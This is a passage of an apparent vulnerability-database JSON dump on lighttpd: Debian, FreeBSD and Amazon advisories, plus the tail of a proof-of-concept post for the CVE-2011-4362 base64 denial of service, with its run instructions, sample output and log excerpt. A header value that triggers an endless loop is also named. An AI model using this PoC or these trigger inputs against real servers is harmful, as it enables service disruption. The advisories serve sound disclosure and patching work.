21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. 
| 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. 
| 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n Usage: ./p_cve-2011-4362 <options>\r\n\r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n\r\n [+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n.\r\n.\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u0417Yg\\u00a7\u041e\u044an\u0446Xt\u0455]rze\u043b\u042b\u0444\u0455gY\u0443\u043f\\u0440\u044fYb\u043eY(\u0457d\u042f\u0448r\u0426[Y\u0443\u044a\u0429-\u00b7xi\u044e\u0438i\u00b0k\u0412Wp\u041b\t]߶\u0448\u0442\\u0434\u0412\u0427@V\u0428\u0434\u00a6x\u0443\u044a\u042dize \r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27504", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "type": "securityvulns", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2368-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nDec 20th, 2011 http://www.debian.org/security/faq\r\n- ---------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : multiple\r\nProblem type : remote\r\nDebian-specific: no\r\nDebian bug : 652726\r\nCVE IDs : CVE-2011-4362 CVE-2011-3389\r\n\r\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\r\nwebserver with minimal memory footprint.\r\n\r\nCVE-2011-4362\r\n\r\n Xi Wang discovered that the base64 decoding routine which is used to\r\n decode user input during an HTTP authentication, suffers of a signedness\r\n issue when processing user input. As a result it is possible to force\r\n lighttpd to perform an out-of-bounds read which results in Denial of\r\n Service conditions.\r\n\r\nCVE-2011-3389\r\n\r\n When using CBC ciphers on an SSL enabled virtual host to communicate with\r\n certain client, a so called "BEAST" attack allows man-in-the-middle\r\n attackers to obtain plaintext HTTP traffic via a blockwise\r\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\r\n no lighttpd vulnerability. However, lighttpd offers a workaround to\r\n mitigate this problem by providing a possibility to disable CBC ciphers.\r\n\r\n This updates includes this option by default. 
System administrators\r\n are advised to read the NEWS file of this update (as this may break older\r\n clients).\r\n\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.4.19+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.28-2+squeeze1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.30-1.\r\n\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk7xJ1MACgkQHYflSXNkfP+N5ACgtImneTJSdyEiCLnWTFA0uxzz\r\nqP0An07LJwL5K3NmrMRfKeCVpigpn1zR\r\n=QU3k\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27485", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "description": "DoS on base64 parsing.", "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12116", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12116", "title": "lighthttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- 
-------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2877-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nMarch 12, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nCVE ID : CVE-2014-2323 CVE-2014-2324\r\nDebian Bug : 741493\r\n\r\nSeveral vulnerabilities were discovered in the lighttpd web server.\r\n\r\nCVE-2014-2323\r\n\r\n Jann Horn discovered that specially crafted host names can be used\r\n to inject arbitrary MySQL queries in lighttpd servers using the\r\n MySQL virtual hosting module (mod_mysql_vhost).\r\n\r\n This only affects installations with the lighttpd-mod-mysql-vhost\r\n binary package installed and in use.\r\n\r\nCVE-2014-2324\r\n\r\n Jann Horn discovered that specially crafted host names can be used\r\n to traverse outside of the document root under certain situations\r\n in lighttpd servers using either the mod_mysql_vhost, mod_evhost,\r\n or mod_simple_vhost virtual hosting modules.\r\n\r\n Servers not using these modules are not affected.\r\n\r\nFor the oldstable distribution (squeeze), these problems have been fixed in\r\nversion 1.4.28-2+squeeze1.6.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.4.31-4+deb7u3.\r\n\r\nFor the testing distribution (jessie), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 1.4.33-1+nmu3.\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG 
v1\r\n\r\niQQcBAEBCgAGBQJTISlcAAoJELjWss0C1vRzdLsf/1umcpRFMVfpb8kJhN9f+KiN\r\nqDASrwyL92FjUknXMP3PjeromIVODaPsCRK9C6zzeCCbNhk97Q2B2fFGVgEVaMmr\r\nv52T6PMyQy0bmWHy1O/aC30JBK5CAs0f/IWscqdKvNsOOTx+lVyWRsdRQfK059i1\r\notvQBsh25ro7jTGXcK1JA1ZTlpr41tmJoTyZR7npY5pEpVq9R9Sjyf/rnKv9RZHW\r\nMJaH3mD8J3gSlQyI+Ff8mAaCI2eMfBUocbAgRZRUwD1jGAM8OSr+PhmTTuMZTUq+\r\nvsa68sLUwUiS10/nJVZDqH5TTcEgs9f1MnOpuBGtpdtw1pMAF51j73crEiJwXpUl\r\njIFvPvBopU1I6EQ2NEz8rj+WCbFeY6kE2FdZmJzUCG5qzBb07Uj0mAgIu8jr1XCJ\r\niEo6ngK3PWrG+8gWl2z7yUT8IrTYValb6Al1rr2NeW3QlfBgSSRtKtpYJ+QU4Jb4\r\n+/7wMUTTwN4G3OzeugB1541CH6KaVSR+1R7BaI+sLvPwf4CSQB3SY04nwRdoYJGg\r\nLa92sLzDI6tc0ETtgApa7akWYvpTcb940SYnUrjz56TOUUdfnDh1ELseFgVAHScz\r\nGqiiPcXm17C7O1SVjUq4VO6NAGgwoBBGdwozK1+FoiSka353rnPB4Sf6pGK9Z/ng\r\nM41qbfBEvSRyUi+6Y4tipRujgRceZwPzXa/ASEGNv98apXaLcMPFhcq5EY7VEY3u\r\nxsAqswdbGUea817rm0XO4A20rwCxCatU61ftDHmsrhwqf2HRzfCgYvFx9JF0S36P\r\nJllrmZqt2wwoZDDQZFKimFGd+UAvRzIjW+Gj3Z1a3LGzn/eRj756TsCZh3D/hGdx\r\niBYYZoYY1DYJ1myL0m4MJxugVkMIAEerVcWVzAjDd6lKhFHLHpa6WPQENEYBw9ek\r\nClB7bPLRwXiy2UGk4akMznl/vsMhzj++p/zN07sLnZWMLEvxSggGmiFhE9+IHvCp\r\nWFJsvc0+miqyJboy7GX3rjNGAoc7yvwsdPm4wwpGJSqC8N/ZDkUCYe5nHmcHt79f\r\nzo/5lUOa87RW/RlrToCig4adXbwk6AKWaoBu7k+C2+VZeIGqHS2oeZrAYhVHDt/A\r\nomFUi2wCN8kQPqDuX8e0EXH+AfinBs+vqB9pavFgMYverqrIoXeL3PPC9XqhAvAf\r\n6yIj9HqFNmLCfBtw3JRLFnnzeErPJvR5/FNYh1yeW/OR8b2B5mnyYeU038aB/j3A\r\n/zsrRABWKdfvb2tTA5cl6DhxBaPKjUJ29ha6325QOLinhbbInKqRrMMjUDqdS2Cy\r\nQD5D2wHpd7ZMbhsa9FDklWnoKcbn5dWp0dUnfkhG8biZsU8bBEdY8gwJS0gD468=\r\n=z7Zk\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-03-24T00:00:00", "published": "2014-03-24T00:00:00", "id": "SECURITYVULNS:DOC:30381", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30381", "title": "[SECURITY] [DSA 2877-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "description": "SQL injection, 
directory traversal.", "modified": "2014-03-24T00:00:00", "published": "2014-03-24T00:00:00", "id": "SECURITYVULNS:VULN:13626", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13626", "title": "lighttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "unix", "description": "\nlighttpd security advisories report:\n\nIt is possible to inadvertently enable vulnerable ciphers when using\n\t ssl.cipher-list.\n\n\nIn certain cases setuid() and similar can fail, potentially triggering\n\t lighttpd to restart running as root.\n\n\nIf FAMMonitorDirectory fails, the memory intended to store the context is\n\t released; some lines below the \"version\" component of that context is read.\n\t Reading invalid data doesn't matter, but the memory access could trigger a\n\t segfault.\n\n", "modified": "2013-11-28T00:00:00", "published": "2013-11-28T00:00:00", "id": "90B27045-9530-11E3-9D09-000C2980A9F3", "href": "https://vuxml.freebsd.org/freebsd/90b27045-9530-11e3-9d09-000c2980a9f3.html", "title": "lighttpd -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "description": "\nUS-CERT/NIST reports:\n\nInteger signedness error in the base64_decode function in the\n\t HTTP authentication functionality (http_auth.c) in lighttpd 1.4\n\t before 1.4.30 and 1.5 before SVN revision 2806 allows remote\n\t attackers to cause a denial of service (segmentation fault)\n\t via crafted base64 input that triggers an out-of-bounds read\n\t with a negative index.\n\n", "modified": "2011-11-29T00:00:00", "published": "2011-11-29T00:00:00", "id": "C6521B04-314B-11E1-9CF4-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html", "title": "lighttpd -- remote DoS 
in HTTP authentication", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:33:43", "bulletinFamily": "unix", "description": "\nLighttpd security advisory reports:\n\nCertain Connection header values will trigger an endless loop, for example:\n\t \"Connection: TE,,Keep-Alive\"\nOn receiving such value, lighttpd will enter an endless loop,\n\t detecting an empty token but not incrementing the current string\n\t position, and keep reading the ',' again and again.\nThis bug was introduced in 1.4.31, when we fixed an \"invalid read\"\n\t bug (it would try to read the byte before the string if it started\n\t with ',', although the value wasn't actually used).\n\n", "modified": "2012-11-17T00:00:00", "published": "2012-11-17T00:00:00", "id": "1CD3CA42-33E6-11E2-A255-5404A67EEF98", "href": "https://vuxml.freebsd.org/freebsd/1cd3ca42-33e6-11e2-a255-5404a67eef98.html", "title": "lighttpd -- remote DoS in header parsing", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:42", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2795-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nNovember 13, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-4508 CVE-2013-4559 CVE-2013-4560\nDebian Bug : 729453\n\nSeveral vulnerabilities have been discovered in the lighttpd web server.\n\nCVE-2013-4508\n\n It was discovered that lighttpd uses weak ssl ciphers when SNI (Server\n Name Indication) is enabled. 
This issue was solved by ensuring that\n stronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\n\n The clang static analyzer was used to discover privilege escalation\n issues due to missing checks around lighttpd's setuid, setgid, and\n setgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560\n\n The clang static analyzer was used to discover a use-after-free issue\n when the FAM stat cache engine is enabled, which is now fixed.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.4.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u1.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-11-13T06:11:59", "published": "2013-11-13T06:11:59", "id": "DEBIAN:DSA-2795-1:2DAAE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00207.html", "title": "[SECURITY] [DSA 2795-1] lighttpd security update", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:00", "bulletinFamily": "unix", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian 
bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "modified": "2011-12-21T00:21:08", "published": "2011-12-21T00:21:08", "id": "DEBIAN:DSA-2381-:320B8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00246.html", "title": 
"[SECURITY] [DSA 2381-] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:25", "bulletinFamily": "unix", "description": "- ---------------------------------------------------------------------------\nDebian Security Advisory DSA-2368-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDec 20th, 2011 http://www.debian.org/security/faq\n- ---------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : multiple\nProblem type : remote\nDebian-specific: no\nDebian bug : 652726\nCVE IDs : CVE-2011-4362 CVE-2011-3389\n\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\n Xi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n\nCVE-2011-3389\n\n When using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called "BEAST" attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n This updates includes this option by default. 
System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "modified": "2011-12-21T00:42:08", "published": "2011-12-21T00:42:08", "id": "DEBIAN:DSA-2368-1:91542", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00247.html", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:58", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2877-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMarch 12, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : lighttpd\nCVE ID : CVE-2014-2323 CVE-2014-2324\nDebian Bug : 741493\n\nSeveral vulnerabilities were discovered in the lighttpd web server.\n\nCVE-2014-2323\n\n Jann Horn discovered that specially crafted host names can be used\n to inject arbitrary MySQL queries in lighttpd servers using the\n MySQL virtual hosting module (mod_mysql_vhost).\n\n This only affects installations with the lighttpd-mod-mysql-vhost\n binary package installed and in 
use.\n\nCVE-2014-2324\n\n Jann Horn discovered that specially crafted host names can be used\n to traverse outside of the document root under certain situations\n in lighttpd servers using either the mod_mysql_vhost, mod_evhost,\n or mod_simple_vhost virtual hosting modules.\n\n Servers not using these modules are not affected.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.6.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.4.33-1+nmu3.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-03-13T04:28:52", "published": "2014-03-13T04:28:52", "id": "DEBIAN:DSA-2877-1:CD2D1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00048.html", "title": "[SECURITY] [DSA 2877-1] lighttpd security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T17:22:30", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures. \n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network. 
\n\nlighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached. \n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-mod_geoip-1.4.34-4.12.amzn1.i686 \n lighttpd-fastcgi-1.4.34-4.12.amzn1.i686 \n lighttpd-debuginfo-1.4.34-4.12.amzn1.i686 \n lighttpd-1.4.34-4.12.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.i686 \n \n src: \n lighttpd-1.4.34-4.12.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.34-4.12.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.34-4.12.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.x86_64 \n lighttpd-debuginfo-1.4.34-4.12.amzn1.x86_64 \n lighttpd-1.4.34-4.12.amzn1.x86_64 \n \n \n", "modified": "2014-09-16T22:37:00", "published": "2014-09-16T22:37:00", "id": "ALAS-2014-299", "href": "https://alas.aws.amazon.com/ALAS-2014-299.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:53", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the \"Connection: TE,,Keep-Alive\" header. 
\n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-mod_geoip-1.4.31-1.5.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.5.amzn1.i686 \n lighttpd-1.4.31-1.5.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.i686 \n lighttpd-fastcgi-1.4.31-1.5.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.5.amzn1.src \n \n x86_64: \n lighttpd-debuginfo-1.4.31-1.5.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.5.amzn1.x86_64 \n lighttpd-fastcgi-1.4.31-1.5.amzn1.x86_64 \n lighttpd-1.4.31-1.5.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T22:49:00", "published": "2014-09-15T22:49:00", "id": "ALAS-2013-179", "href": "https://alas.aws.amazon.com/ALAS-2013-179.html", "title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:43", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nInteger signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686 \n lighttpd-1.4.31-1.2.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.2.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64 \n lighttpd-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64 \n 
